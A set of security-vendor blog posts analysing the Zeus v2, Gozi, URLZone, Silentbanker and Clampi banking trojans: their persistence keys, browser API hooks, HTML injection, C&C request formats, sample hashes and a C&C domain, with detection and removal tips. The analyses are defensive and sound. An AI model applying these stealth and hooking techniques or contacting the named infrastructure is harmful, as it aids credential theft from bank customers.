On Windows Vista and Windows 7, you’ll experience the same confirmation but it looks slightly different:

But once again, a legitimate Windows process (taskhost.exe) is asking to be allowed by the user!!!

The “funny” thing is that in the case of Zeus v2 running as administrator, there is no need for this security alert when using the built-in Windows Firewall as the Windows Firewall is probably the only firewall in the world where you can programmatically allow any program (see the fairly undocumented Windows API WindowsFirewallAddApp).

Functionality

The above dialog is produced by Windows as the Zeus v2 Trojan tries to listen and accept connections from the computer. In all of our samples, this port was port 13851 as per the screenshot below and Zeus v2 operates a SOCKS proxy on this port.

This SOCKS proxy allows the bad guys to relay any internet requests through the victim’s computer, which in turn means that any internet requests that the bad guys execute will show up as if it would have been done by the victim. So any passive fingerprinting technologies employed by the web service provider will always see the correct public IP address (and thus the corresponding geographic lookup). This is in use by many risk engines for web authentication.

The SOCKS proxy has another advantage: The bad guys can relay any TCP and UDP traffic through the victim’s machine.

However please note that this SOCKS feature is not new, however obviously we haven’t seen this feature in active on non-administrator accounts! And on Windows Vista and Windows 7, there is actually a big chance that users will allow this as the warning mentions that a legitimate Windows component needs permission to run!!! This is definitely new.

Initial Handshake, Configuration file

See the in-depth report

Firefox Hooking

As mentioned above, this Zeus variant is capable of compromising Firefox in exactly the same way it compromises Internet Explorer. As a result, you will find that a Zeus infected system will have quite a few “hooks” of legitimate Windows functions internally.

These “hooks” mean that the Zeus Trojan is making sure that when Firefox calls HttpSendRequest, the call does not go directly to the Windows API, but rather via the Zeus Trojan before going to the Windows API. In doing this, Zeus has full control over the HTTP and HTTPS sessions made by the Firefox browser.

GMER and other rootkit hooking tools detect the following hooks into the Firefox browser.

However the interesting thing is that GMER and other rootkit tools seem to miss a few hooks as these functions are not really used by Firefox. The above functions are from WININET.dll and Firefox uses its own API to connect to the Internet. It also uses OpenSSL for SSL encryption/decryption and all these functions are wrapped in nspr4.dll (which resides in the Firefox program folder).

For an overview of how these are used, please refer to the Mozilla documentation at: http://www.mozilla.org/projects/security/pki/nss/ref/ssl/sslintro.html

If we look more closely, we can see the key functions that are hooked for Firefox are the following ones from nspr4.dll (naturally, we can use TrustDefender for this task :-).

As per the above documentation from Mozilla, if you have full control over PR_Read and PR_Write, you have full control over any Internet connection that Firefox is making, regardless of whether it is HTTP or HTTPS. It also doesn’t even matter whether it is a site with an EV-SSL certificate, as seen in the below image of a legitimate site with an authentic EV-SSL certificate.

So by hooking these functions, Zeus has full control over the session and can now inject any arbitrary HTML code into the browser whenever the bad guys want. Naturally they can see the full URL as well.

Please note that Zeus uses the same approach for hooking the Internet Explorer, however, since Internet Explorer uses different libraries for Internet connections, different DLL’s will be hooked.

However we want to make it clear that Zeus is not exploiting any particular vulnerability in Internet Explorer or Mozilla Firefox. It compromised the environment where the browsers operate and thus is able to get full control over the session.

The interesting thing we observed is that the majority of the new Zeus variants don’t inject HTML code into public websites, but rather only do this once a user has been successfully logged in to a specific site. They do this for various reasons and we will cover these in more detail in our next in-depth report. However, by doing this it means that you can’t see Zeus in action without a valid login, making detection extremely harder.

The following screenshot shows the new Zeus variant in action for a financial institution[2]:

<<screenshot available in the in-depth report>>

Windows Vista and Windows 7

One of the most disturbing features of this new Zeus variant is the fact that is capable of running not only on Windows XP, but also on Windows Vista and Windows 7 (we only checked 32 bit so far).

The big question was how they can do this despite of the hardened features of both operating systems.

Well first of all, when you execute the Zeus Trojan the Windows UAC does not kick in, meaning that the Zeus Trojan installer does not run with administrator privileges.

Although this in itself is a good thing as it means the Zeus Trojan cannot do any system-wide changes, the bad news is that Zeus still manages to infect the currently logged on user. The upside of being able to infect the machine without UAC outweighs the downside of only infecting the currently logged on user since that’s who they are targeting anyway.

The Zeus v2 Trojan takes this into account and will use random names for all events and semaphores … so that it can happily run multiple instances for multiple users on the same computer.

After we executed the Installer, the following registry entry is added to make sure that the Trojan runs when the computer is rebooted. Please note that this entry is in HKCU which means that this only applies to the current user and not for any other users of the computer.

This is different to older versions of the Zeus Trojan as they would install themselves in the Userinit value of the Winlogon key globally (HKLM – HKEY LOCAL MACHINE).

Another point to note is that the filename is random and will be different for every installation.

Thus it becomes apparent that to overcome the hardened features of Windows Vista and Windows 7, Zeus v2 was forced to use a different approach to compromise the current user as it does not have the permission to change global settings on these operating systems.

What is very, very disturbing and worrying is that the Zeus v2 Trojan can pretty much do everything it does with or without administrator rights. You would assume that all of the hard work that Microsoft has put in to protect you would pay off. You would assume that using a user without administrator right is more secure, right? Well, it doesn’t really appear so.

Windows XP – without administrator rights

In Windows Vista and Windows 7, all users run without administrator rights and the UAC kicks in if some administrative privileges are needed. Such a concept doesn’t exist in Windows XP and therefore you are much more locked down if you run as non-administrator.

If we run the Zeus v2 Trojan under Windows XP SP3 without admin rights, we noticed the similar Windows Security Alert when the Zeus v2 Trojan tries to install the SOCKS proxy, however this time there is no option to allow it (as we don’t have admin rights).

There is no option to allow this and therefore the SOCKS proxy functionality will not be available. Funnily enough this means that Windows XP users without admin rights are better protected as Vista or Windows 7 users who run without admin rights by default!

However as noted above, this doesn’t stop the Zeus v2 Trojan itself from working and it just means that the SOCKS proxy feature is not working. Everything else works fine… So after the above dialog box is closed and the user logs in to a website with HTML injection configuration, “usual” behaviour will kick in.

The following screenshots depict a user without administrator rights on a Windows XP SP3 machine. (the red circles highlight the injected HTML). Please also note that the SSL certificate and everything else is correct)

<<SCREENSHOTS AVAILABLE IN THE IN-DEPTH REPORT>>

Code Injection

Traditional versions of Zeus would inject themselves into the winlogon.exe process and spread from there (e.g. to svchost.exe, lsass.exe, services.exe). However, since the new versions of Zeus don’t run with administrator privileges, they cannot inject any code running as a different user (especially the SYSTEM account). Therefore the new Zeus v2 Trojan injects itself into the following processes ctfmon.exe, explorer.exe, rdpclip.exe, taskeng.exe, taskhost.exe and wscntfy.exe instead.

The reason for this change in approach is pretty simple – winlogon.exe is a SYSTEM process and without administrator privileges, the Trojan would not be allowed to inject anything, so the above alternative targets were chosen as they all run as the currently logged in user.

Since all these processes run as the currently logged on user and the Windows security settings allow the Zeus Trojan to modify the memory allocated by any of these applications, Zeus is now able to hook key windows functions (see earlier chapter about hooking) and inject its own code into the process, bypassing the hardening features of Windows Vista and Windows 7.

An important fact to know is that the process that will be started through the registry key above will terminate itself after it injects itself into the other processes, meaning you won’t be able to find a process running under the name of olews.exe.

Microsoft / Firefox Phishing Filter

One interesting addition is that the Zeus v2 Trojan will disable the Phishing Filter that is enabled by default in Internet Explorer 7 and later versions. The Zeus v2 Trojan does this simply by altering the registry setting HKCUSoftwareMicrosoftInternet ExplorerPhishingFilter to set the Enable and EnableV8 names to 0.

Firefox users are slightly better off as the Zeus v2 Trojan hasn’t yet figured out how to disable the Safebrowsing features of Firefox.

Interesting observations

<< available in the in-depth report >>

TrustDefender’s Approach to Zeus v2

TrustDefender’s Forensics Engine will immediately pick up all of the new Zeus v2 infections by default, and will protect you against the threat from a frontend (user-view) AND a backend point of view. TrustDefender enables financial institutions to deal with Zeus v2 on the server side through its real-time, risk-based Enterprise Server, and the TrustDefender Agent will successfully protect the end-user at home. No longer does a financial institution have to rely on the end user to do something, but rather they can mitigate and deal with the threat from their own backend systems and feed this information into existing systems including risk-engines, adaptive authentication suites and transaction monitoring tools etc.

How to detect that a system is compromised

Since the new variant of Zeus doesn’t use complex rootkit techniques, detection is relatively easy. Simply start the registry editor (regedit.exe) and check for an entry in the Run section of HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun.

The things to look out for are:

  • Name looks like a GUID (such as {26014332-876A-668A-546A-2A9930E39482})
  • Value is a filename in %USERDIR%Application Data<RANDOM DIR><RANDOM FILE>    (such as “C:Documents and SettingssupportApplication DataKyniinyqypy.exe”)

How to remove Zeus v2

Removal of the Zeus v2 Trojan is also much easier since no complex rootkit techniques are used.

Simply locate the file that is being run from the above registry entry and delete the registry entry and the file. After a restart, your computer is clean. :-)


[1] http://www.zdnet.com.au/microsoft-ie-use-falls-below-60-339302834.htm

[2] It wasn’t straightforward to provide a screenshot as the configuration of the Zeus Trojan would only inject HTML into the browser after a successful login.

Gozi – a perfect example of an “older” trojan re-inventing itself

Executive Summary

Gozi is a well known Trojan that has been around for a number of years now. However, we have recently encountered a new wave of Gozi variants and feel that this is a great opportunity to look at this sophisticated Trojan and how it has evolved over the last few years.

Gozi has always been associated with a Russian heritage and was once part of the notorious, russion cyber crime operations. The last significant wave of Gozi Trojans was back in 2007/2008 and at that time Gozi’s feature list was more than impressive. According to SecureWorks who did an in-depth analysis of the Trojan at that time, Gozi’s features included:

  • Advanced Winsock2 functionality employed to steal SSL data
  • State-of-the-art, modularized Trojan code
  • Ability to spread through IE browser exploits
  • Customized server/database code to collect sensitive data
  • Customer interface for on-line purchases of stolen data
  • Accounts compromised by stealing data primarily from infected home PCs
  • Victims included accounts of top financial, retail, health care, and government services
  • Data’s black market value of at least US$2 million
  • Ability to remain undetected for weeks or months by many AV vendors

As you can see, one of the most impressive features was the way Gozi was able to hide on a system and stay undetected for a long period of time, ultimately allowing it to carry out its nasty work undisturbed.

In this in-depth report, we will look at the new variant of Gozi, and how it has improved Gozi’s renowned stealth behaviour even further. We also look at how Gozi will does its dirty work and present details of the inner workings of this malware. As always, the report will also contain instructions relating to the detection and removal of this nasty threat.

Installation

We analysed a number of Gozi samples and all of them were delivered as drive-by-infections, either via malicious PDF documents or via exploit kits (such as Justexploit).

Malicious PDF document

We witnessed a number of Gozi Trojans distributed via malicious PDF versions. We specifically looked at a PDF with MD5 b72163b1d5fbc0f2e88e984bf0ac601e, which exploits a buffer overflow in Adobe Acrobat Reader (CVE-2007-5659). The only goal of the malicious PDF is to download the “real” Gozi sample called update.exe with MD5 cd4d37ea17007cbdfa0d9cc96b5fc1dc.

This sample has successfully evaded detection by all Antivirus Engines with a VirusTotal detection of 0% on Jan 25, 2010! This only attests to the sheer ability of Gozi to conceal itself.

This Trojan seems to achieve one of the worst detection rates we have encountered, which is quite extraordinary considering that Gozi itself has been around for such a long period of time. Even within 10 days the detection rate of Gozi was still only 65% which is interesting as all participating Antivirus Engines receive the samples that they won’t detect.

Justexploit kit

The samples we analysed from drive-by-infection kits had a slightly better VirusTotal antivirus rating with 27% (11/41) detection on Jan 28, 2010 (http://www.virustotal.com/de/analisis/17fcef4a88cfc950a62d2c79e1670cc9b9d742cd4ea3310e0df337fef7451ed8-1264637346)

Please note that Justexploit, a common feature of today’s exploit kits, uses geographic distribution. This means the bad guys will only infect people they want to infect (targeted regions). In this particular case we could confirm that the installation process was fine in Australia, UK, Germany and the US.

Execution

After the sample is executed, Gozi installs itself in the system in a very sophisticated way that fools most traditional security solutions and additionally deletes the installer file from the hard drive.

The Gozi Trojan consists of a DLL that is injected into every single process. Gozi employs a pretty unknown procedure of registering the DLL within the AppCertDlls subkey of HKLMSystemCurrentControlSetControlSessionManager key of the registry. By doing this, Gozi is notified and automatically loaded into every single process that is started on the computer from the windows kernel (kernel32.dll).

This method is a very innovative approach and by utilising such a highly unknown feature, many security solutions that check automatically started programs (e.g. through the Run registry) will miss this infection.

The associated filenames seem to be semi-random and in our case we saw krnlbkup.dll and lnksinfo.dll. Both files reside in the system32 folder of the windows directory (c:windowssystem32).

File System Stealth

See in-depth report

Registry changes

See indepth report

Process hooks

See indepth report

The C&C communication

See indepth report

Gozi C&C server

See indepth report

Gozi configuration file

See indepth report

Functionality of Gozi

Keylogging / Network sniffing

One of the main functionalities of Gozi is to steal any data that is transmitted over the internet. Gozi will not employ keylogging techniques to do so, but rather look at any POST request that are sent to the internet from the computer and will send the interesting content to the Gozi C&C server.

As Gozi is running as part of the Internet Explorer process, it has full control of the data BEFORE it is encrypted and therefore Gozi can get access even to the SSL encrypted data. Naturally this included websites with EV-SSL certificates as well.

The following example shows the Gozi traffic for a login attempt with Bank of America. Firstly we see the use of EV-SSL in the browser, as depicted below:



After the Online ID is entered by a user and the “Sign In” button is clicked, the following internet reqest can be seen sending to the Gozi C&C server:

Please note that we used a fake online ID 123123123 and chose NV as the State, as captured by Gozi in the above snapshot.

The next step of Bank of America’s two-step login procedure will then allow Gozi to intercept the password, as can be seen in the following request capture:

As you can see, we used mypassword as a password and this too was captured by Gozi.

SOCKS Proxy

Gozi has the ability to install a SOCKS proxy on the machine. On both installations, this did not happen and no backdoor was installed. (The HTTP C&C parameter socks was equal 0). If a SOCKS proxy is installed, the C&C server is notified by the listening port of the SOCKS proxy in the socks HTTP parameter.

A SOCKS proxy enables an attacker to relay any internet traffic through a victim’s machine and therefore evade geographic or public IP risk mitigation strategies.

Real-time functionality / HTML injection

Gozi has learned from the past and has adapted to some authentication improvements by financial institutions in the past. It does not only have the ability to statically send keystrokes or POST credentials to the C&C server; it can also alter the HTML of the current page.

Gozi accomplishes this by using the configuration file and either statically inject the HTML from the configuration file or dynamically downloading HTML chunks to accommodate whatever it needs to do. Gozi will firstly identify the financial institution using its URL and will then make a request to its C&C server in real-time for additional instructions.

As the analysed Gozi sample has only Swiss banks in the configuration, let’s look at a login attempt to Credit Suisse:

When the user is clicking on Login, the following internet traffic can be seen:

The Gozi Trojan will make a request to the C&C server with the following format:

  • GET /1.pl?<BANKID>&<id>, where
    • <BANKID> represents different targets based on the configuration file. Four different targets have been confirmed in this analysis, however this can easily change as part of the configuration file
  • depending on the <id> parameter, different HTML chunks will be delivered.

After the 1.pl request is completed, Gozi will send “as normal” the login credentials to the C&C server

Upon first analysis, Gozi will do this for all financial institutions that have some kind of challenge/response or use some additional authentication mechanism (such as banks with the RSA token)

For all C&C communications where the URL matched a financial institution from the configuration file, the response from the Gozi C&C is always “/home/system/data/base_cur/fastlogs/ok!”

It even includes compromised account details

See indepth report

History and Improvements of Gozi over time

Based on the previous research of SecureWorks relating to the older samples of Gozi, (http://www.secureworks.com/research/threats/gozi/), we can see great improvements of this threat over time.

In 2007 and 2008, all Gozi samples we found were executables that were running as a proper process on the system (such as x_ymvb.exe or xrt_ohcq.exe in the %UserProfile% directory). They were loaded for every Windows startup through inclusion into the HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun registry key.

This had some obvious disadvantages, namely that the Gozi process was clearly visible to traditional security scanners. As such, Gozi had to work very hard to get access to the internet traffic produced by the web browser. This was summarised in the below SecureWorks analysis:

The code reveals that calls to functions in ws2_32.dll are used to establish itself as an LSP (layered service provider) using the Winsock2 SPI (Service Provider Interface). It “goes in between” Internet Explorer and the socket used to send the data. This is consistent with reading/enumeration of registry keys having to do with network interfaces, zones, and namespace providers. This is the mechanism used to bypass SSL/TLS and intercept the network data on the fly, before it is encrypted.

This new version of Gozi does not run as its own process, but rather as a DLL that is injected into the web browser process. Furthermore it is uses a highly unknown way of making sure it gets injected into every process as a means of ensuring increased effectiveness.

This also removed the need for a LSP interface at all as LSP is known to be very unstable.

These improvements were clearly made to allow Gozi to stay hidden in stealth like mode on the system and to ensure Gozi is not easily detected by traditional security scanners.

How to detect Gozi

Manually

The best way to detect the presence of the Gozi Trojan is to look in the registry for the presence of the Gozi values. They are all consistently present here:

  • Gozi DLL
    • HKLMSystemCurrentControlSetControlSessionManagerAppCertDlls
      • (where you’ll find a reference to the Gozi DLL)
  • Gozi configuration
    • HKCUSoftwareAppDataLow{GUID}
      • (where {GUID} is a globally unique identifier)

TrustDefender

Of course, TrustDefender will detect Gozi straight out of the box as it will see the Gozi DLL being injected into the Web browser process.

How to remove Gozi

As Gozi consists only of the one DLL, one can remove Gozi from the system by removing all related registry entries presented in this report. However, since the Gozi DLL is well hidden, it is not really straightforward to delete the Gozi DLL entries.

First, you have to identify the name of the Gozi DLL (e.g. lnksinfo.dll in our case) and then use a utility such as MoveFile from Sysinternals (http://technet.microsoft.com/en-us/sysinternals/bb897556.aspx) or directly poking the entry with the PendingFileRenameOperations registry key.

After a reboot, the file would have disappeared (you can check with the auto-complete tab trick) and you can verify that the Gozi registry entries are all gone, making your system safe again.

Further Information

Further information can be obtained from the team at TrustDefender Labs by emailing us at labs@trustdefender.com.

URLZone – a disaster waiting to happen

indepthreport-availableThanks to an effective PR strategy, most probably everybody has heard about URLZone by now. If not, you can find out more information regarding URLZone here or here.

We have been talking about it for some time and we already witnessed a few Trojans already using this technique. However, URLZone (or Bebloh) is now the first Trojan to come up with a professional setup to steal money from your account. Not only does it completely control your internet banking session, but it also automatically performs wire transfers to mule money accounts. If this isn’t bad enough, URLZone will then manipulate your online account statement to offset the fraudulent transaction (it can also remove the transaction or change the amount). The first time a victim would become aware of the fraudulent transaction(s) may be weeks or even months later – when they receive their paper statement in the mail! (that is if they get a paper statement at all… Lots of banks are trying to get rid of it altogether!)

Although real-time and session-based Trojans have been around for quite a while, they weren’t used in such a sophisticated way. An example was Yaludle (a Silentbanker variant), which injected HTML into the website that was dynamically retrieved from the web in real-time!

At the moment, only German banks are part of the URLZone configuration, but the bad guys can change the configuration at any second. Attacks against German online banks have always been very sophisticated simply because the German banks have employed one-time-password mechanisms (so called transaction numbers or TAN’s) for many years. Now the bad guys have found their way around it these mechanisms using such sophisticated techniques.

First generation attacks employing such Trojans saw the bad guys inject HTML code into the online banking login page to gather TAN’s in classical phishing attempts.

Then we saw more sophisticated attacks using variants of the well-known Bzub Trojan, which had the ability to perform wire transfers and remove them from the account statement.

Now we have URLZone doing silent wire transfers in the background and changing the online account statement.

Only as a result of the big amounts that these Trojans are fraudulently stealing are we beginning to hear about URLZone in the news, such as the recent $447,000 USD heist at Ferma in California, USA. While the manager had issued legitimate payments, the program initiated a further 27 transactions to various bank accounts, siphoning off a total of $447,000 USD in a matter of minutes. “They not only got into my system here, they were able to ascertain how much they could draw, so they drew the limit,” says Roy Ferrari, Ferma’s President (http://www.technologyreview.com/computing/23488/?a=f).

Another high-profile case was the gigantic Zeus botnet of recent, that also resulted in large amounts being stolen, such as the $415,000 USD heist at Bullitt County, Kentucky (http://voices.washingtonpost.com/securityfix/2009/07/an_odyssey_of_fraud_part_ii.html).

And let’s not forget Signs Designs Inc who also recently lost close to $100,000 USD in similar attacks (http://voices.washingtonpost.com/securityfix/2009/09/more_business_banking_victims.html).

In light of the above, I want to point out a few notes:

  • Firstly – The problem has been around for a long time and it seems that people are only doing something about such threats when they are large enough to be mentioned in the press. That’s exactly what the intelligent botnets such as Mebroot/torpig are exploiting. By staying under the radar and not being too greedy they can do their dirty work and don’t have to worry about consequences. Their motto seems to be: Just keep the security industry busy with non-threats like conficker and they won’t hassle you.
  • Secondly – This type of attack cannot be solved with 2-factor authentication.
  • Thirdly – While there is much hype around URLZone at the moment around how amazing and disturbing it is that the bad guys can do such things, we will always have this problem if the bank’s security and the user’s security systems are not connected.
  • Fourthly – While the Trojan is very, very sophisticated and advanced on the delivery side, they have made it incredibly easy for the good guys to catch them. Don’t expect this to happen in the future with new variants. We are still at the beginning…

One further thing to note is that since all real-time, session-based Trojans need to talk to a C&C server during the banking transaction, just one of TrustDefender’s many layers of protections will fully protect you against such attacks. Our “Secure Lockdown” knows all internet requests that belong to the financial institution and will block everything else while you are in a banking transaction. This will always protect you for all Trojans that work on this principle, not just for the likes of URLZone.

In addition, our Forensics Engine will also pick up the URLZone Trojan itself and will alert you of the infection, while also automatically disabling it for the period of the transaction. This will ensure you are always Safe and Secure while transacting online.

Due to popular demand, we have put together an in-depth TrustDefender Labs report about URLZone, which you can request by sending an email to labs@trustdefender.com. The in-depth report features the complete inner workings, together with an analysis of the configuration file and forensics information.

A first look at Microsoft’s free Antivirus Engine Security Essentials (MSE)

With much press attention, Microsoft released its free Antivirus Engine called Microsoft Security Essentials. We had a quick look at it and while Microsoft has done a pretty good job altogether (quick, nice user interface, fairly decent signature database), it is what it is: an Antivirus Engine that is based on blacklists / heuristics.

However this means MSE won’t protect you against the sophisticated Trojans that we hear in the press almost daily. We have successfully infected a machine with enabled and up-to-date MSE with a new mutation of the Zeus Trojan that is active in the wild. (for the interested reader, here is a screencapture movie that also shows how TrustDefender protects you from Zeus).

So in our opinion MSE will not make any impact on the malware landscape at all, however it will most certainly take market share from the other Antivirus Vendors and put the pressure on them from a pricing point of view.

Silentbanker reloaded

indepthreport-availableIt’s been a while since we last looked at and analysed a Silentbanker Trojan in October 2008 and we have written about it on our blog at http://www.trustdefender.com/blog for some time.

The last couple of weeks/months have been quiet for Silentbanker, but now Silentbanker is back in action, very alive and kicking. We now have another detailed look at these new variants, how they now operate and how they have continued to evolve from last year.

The interesting fact is that it hasn’t evolved that much and they haven’t included too many new features. This is partly because the Silentbanker Trojan has already an impressive list of features, including HTTP(S) form sniffing, network tracing, session hijacking and html web injection capabilities.

The Silentbanker Trojan will only affect Internet Explorer and not any other Browsers as it is implemented as a Browser-Helper-Object (BHO).

However compared to the new top dogs who have stepped up the pace and gained extensive publicity such as Zeus, Mebroot/Torpig or Clampi, it seems nowadays the Silentbanker Trojan is a fairly average sophisticated Trojan, as Silentbanker only employs basic rootkit techniques, uses no encryption for upload of the stolen data and has a fairly basic C&C infrastructure. This – however – doesn’t mean that Silentbanker is not up to the task. It just shows how much innovation the bad guys have shown for the other Trojans.

But as the Silentbanker Trojan is completely silent and won’t slow down the computer at all, most users will not find any suspicious behaviour and we assume that it was very effective especially in its first couple of weeks of operation.

In conclusion, it becomes pretty obvious that the Silentbanker Trojan has fallen behind the likes of Mebroot/Torpig, Clampi or Zeus in terms of sophistication. While this may be perceived as good news, the bad news is that this means that the employed techniques still work and on top of that that the creators will for sure enhance the Silentbanker Trojan in the future. Watch this space…

Installation

We analysed the Silentbanker dropper with MD5 of e1e2b3389dd2e020ae2783b8c6c80a08 which had a Virustotal detection of 12/41, 29.27% (http://www.virustotal.com/analisis/112946f35cf76ed853b44aeaf837cc5c9ad15722e46637e3af1f82b4b122f41b-1252598004)

The inner workings haven’t changed too much from the Silentbanker Trojans we analysed around the same time last year in October 2008.
The dropper will install a Brower-Helper-Object (BHO) and register its payload dll into the Internet Explorer. The payload was in our case mscorewr.dll (in c:windowssystem32 folder) with a Virustotal detection of 9/41, 21.95% (http://www.virustotal.com/analisis/7b062ddb9dbc50cea53b98df892d4ceac003ece8551976085bd7ff57d5a5c664-1252582306).

The Silentbanker Trojan comes with a hard-coded C&C server which in our case was businessrest.cn (190.183.60.82).

Usermode hooks

Once the Silentbanker Trojan is active in memory (basically when the Internet Explorer starts), it will setup export hooks, so that it gets access to all transmitted internet traffic and to much more information.
Now, all sophisticated Trojans will hook core windows functions to compromise the system. Our Silentbanker Trojan hooked (or redirected) among others the following core windows functions: (full details available in the in-depth report)

  • HttpOpenRequestA/W
  • HttpSendRequestA/W
  • InternetConnectW
  • InternetReadFile
  • InternetReadFileExA/W
  • InternetWriteFile
  • CommitUrlCacheEntryA/W

As you can see, it basically hooks all Internet related functions to get access to the Internet Traffic (even though it might be encrypted with SSL or EV-SSL!)

These usermode hooks enable the Trojan to do its dirty work.

HTML Web injection

The Silentbanker Trojan has also the capability to inject any arbitrary HTML code into a website and it makes use of this mainly to get additional information from the user. The disturbing fact is however that this is also possible with HTTPS together with EV-SSL certificates. This way, the website looks legitimate from all angles. The URL is correct, the SSL certificate is fine and the green bar is shown. The reason is that the website actually comes from the legitimate site; however the Silentbanker Trojan will locally inject its malicious HTML code to the site. The code depends for each financial institution and is part of the configuration file.

A few examples are:

winject1

winject2

How to detect the Silentbanker Trojan

As the Silentbanker Trojan is a Browser-Helper-Object (BHO), you’ll see it appearing in the “Manage Add-ons” option of the Internet Explorer (From the Menu, choose “Tools” and then “Manage Add-ons”).
In our case the Trojan was called “mscorewr” and pretended to be a “Macrovision” component.

How TrustDefender protects you

As you would expect, TrustDefender protects you against Silentbanker from the very first second. TrustDefender employs a defence-in-depth strategy, and we are happy to say that every single component alone will protect you against Silentbanker.

  • Malicious BHO
    TrustDefender will automatically protect you from malicious Browser-Helper-Objects and makes sure that those components cannot penetrate the current session
  • Usermode Hooks
    As described before, this is how Silentbanker will get access to all its information. TrustDefender’s Forensics Analysis will pick up these hooks and disables these hooks for the current session
  • Secure Lockdown
    As Silentbanker works in realtime and will send the stolen credentials to its C&C server at the time of login, TrustDefender will automatically block this request as the Secure Lockdown will only allow internet requests that are associated with the current webservice (e.g. online bank).

Further Information

Further information can be obtained from the team at TrustDefender Labs. Just email us at labs@trustdefender.com.

Why is Clampi / Ilomo so effective? An analysis with detection/removal info

Introduction

This is an in-depth analysis of a Trojan called Clampi or otherwise known as Ilomo or Clomp. Clampi got quite a bit of press coverage lately. As always, most press reports are not really technically correct and we look at Clampi here from a technical point of view.

The Clampi malware is one of the hardest malware to analyse. Even in the scope of the high-end of sophistication with well-known Trojans such as Mebroot, Silentbanker, Zeus, … Clampi is by far the hardest to analyse. Reasons for this are the multiple VMProtect protection, extensive use of encryption and unique design approaches such as the subversion of the registry to store the malicious files. No payload will ever be written to the harddrive. Clampi will download the encrypted files and store them in an encrypted format on the harddrive.

The way Clampi is setup; it is a very robust Trojan, both in terms of resilience and resistance. It can talk to numerous C&C servers and any payload can be deployed, so Clampi can be used for pretty much every malicious purpose.

Even though Clampi is incredibly sophisticated, there is still room for improvements and we believe there will be soon new variants of Clampi available that are much, much harder to detect as they “fix” the existing limitations.

However Clampi is not a new trojan. It is known since 2007 and the security industry didn’t really grasp the full scale of its badness due to the fact that nobody really knew what it is doing exactly for the reasons mentioned above. We hope we can shed a bit of light into the operation of Clampi and help strengthen the “good” side.

Please note that this public blog doesn’t contain all the technical information and we have an in-depth report of Clampi available for interested parties. Just send an email to labs@trustdefender.com.

Payload

After the installer executes, there will be a newly created file in %UserProfile%Application Data, which is either of the following

  • svchosts.exe, taskmon.exe, rundll.exe, service.exe, sound.exe, upnpsvc.exe, lsas.exe, logon.exe, helper.exe, event.exe, dumpreport.exe, msiexeca.exe

The filenames look genuine and are pretty much all names from legitimate windows components; however these files are now instrumental for the Clampi infection. Note only the filename changes, the content and the MD5 of the file is always the same (61316320065e85ff4a6a594d7fedf141 in our case). Antivirus detection was fairly average as well with 18/41 AV engines detecting it (http://www.virustotal.com/analisis/21bd2536687790c8318ac5936d4cad37decf0fee808e4f4ca8c619485cbf8a16-1249326956). As with the installer, some big names didn’t detect it (such as AVG, F-Secure, and Kaspersky)

The payload is added to HKEY_CURRENT_USER Software MicrosoftWindowsCurrentVersionRun so that it runs with every start. However it is noted that it will only start for the current user. Clampi will not add this registry to HKLM!

Automated analysis of the payload

Security researchers rely more and more on automated analysis of malware samples; however this automated analysis is still pretty limited as they don’t show anything in this particular case. Virustotal didn’t say anything and Anubis only noted that sound.exe started the Internet Explorer. While this is not suspicious at all, it already hints to one evasion technique of Clampi which we will analyse in more detail later.

Execution

procexp_iexplore0First of all, Clampi uses a number of evasion techniques that are quite extraordinary and special. Clampi breaks its functionality up into various parts and is using sophisticated techniques to perform its job and to stay undetected.

When the payload starts, it will automatically start an instance of the Internet Explorer as well.

 While this doesn’t seem too suspicious, a closer look reveals a number of very interesting facts:

  • First of all, the iexplore.exe with PID 216 runs in suspended mode, which means that it is not accessible at all.
  • Secondly, the iexplore.exe with PID 216 is the “real” and genuine iexplore.exe process, but it has some weird program arguments

iexplorer_arguments

This Internet Explorer process is responsible for all outgoing internet communication to the Clampi C&C server. This was clearly also done to evade Personal Firewalls as they would see an internet request from the legitimate Internet Explorer which is obviously allowed.

new-tcpview

This also shows a limitation of the Clampi C&C server. Once you stop or kill the Internet Explorer Process, Clampi cannot talk to its C&C anymore and is basically defeated.

Download of 4 (or more) modules

After the original handshake, Clampi then initiates internet requests to the newly C&C servers and will download additional 4-6 payloads (depending on the C&C configuration) . However Clampi will never write these payloads to the harddrive!!! It will write them in encrypted form into the Registry at:

  • HKCUSoftwareMicrosoftInternet ExplorerSettingsM00
  • HKCUSoftwareMicrosoftInternet Explorer SettingsM01

These payloads are the “real” nasty stuff and the bad news is that they are all encrypted over the wire and also in the registry. However in memory they have to be decrypted, so the encryption is not really the problem… They are all packed with VMProtect which makes analysis almost impossible! (see next chapter)

There is actually another module, which gets encrypted only in memory. Now these modules are all VMProtect protected – except M04 which is an exact copy of psexec.exe from sysinternals. We will later come to this in a bit more detail.

Registry layout

As mentioned before, after the initial infection, Clampi will never write anything to the disk anymore. This was clearly done to evade detection from Antivirus Engines that hook harddrive access. Clampi will write all its malicious files directly into the registry in an encrypted format

new_regedit

more detaila are available in the in-depth report.

Usermode Hooks

In the same way other sophisticated malware is “hooking” key windows function and redirecting them to their memory region, Clampi will hook

  • HttpSendRequestA
  • HttpSendRequestW
  • InternetQueryDataAvailable
  • InternetReadFile
  • InternetReadFileExA

 new_cmcrootkit

And with these hook, Clampi has access to all internet communication even if it is SSL encrypted. However these hooks will only installed for the Internet Explorer and NOT for Chrome of Firefox.

Location and availability of C&C Servers

available in the in-depth report.

How TrustDefender will protect its customers

TrustDefender will automatically protect all its customers against Clampi in several ways.

Firstly, for our enterprise customers, communication to the C&C servers is cut-off automatically due to our Secure Lockdown feature as part of the client policies.

Secondly, TrustDefender will identify the unknown process that starts the Internet Explorer and will prevent it from doing any harm.

Thirdly, TrustDefender will pickup the Windows Hooks and automatically resolves them so that the Internet Session is encapsulated from Clampi.

And fourthly, the Kernel Forensics Engine makes sure that the transaction is safe.

The following screenshot shows the detection of Clampi. Please note that in the OEM edition, this screen won’t appear and the information is handled by the Enterprise Server.

new_trustdefender_kfe

How to detect that a system is compromised

The detection is pretty easy if you have access to the machine. Simply check for the existence the Clampi Registry keys which are described in the Registry chapter before.  Check for existence HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerSettingGatesList and if you find this, you are infected.

Furthermore, check for a process with one of the following names (svchosts.exe, taskmon.exe, rundll.exe, service.exe, sound.exe, upnpsvc.exe, lsas.exe, logon.exe, helper.exe, event.exe, dumpreport.exe, msiexeca.exe) and check whether they have launched the Internet Explorer with procexp from sysinternals.

HOWEVER, don’t log in to infected workstations using domain administrator credentials as this is how it spreads (using psexec).

How to remove Clampi

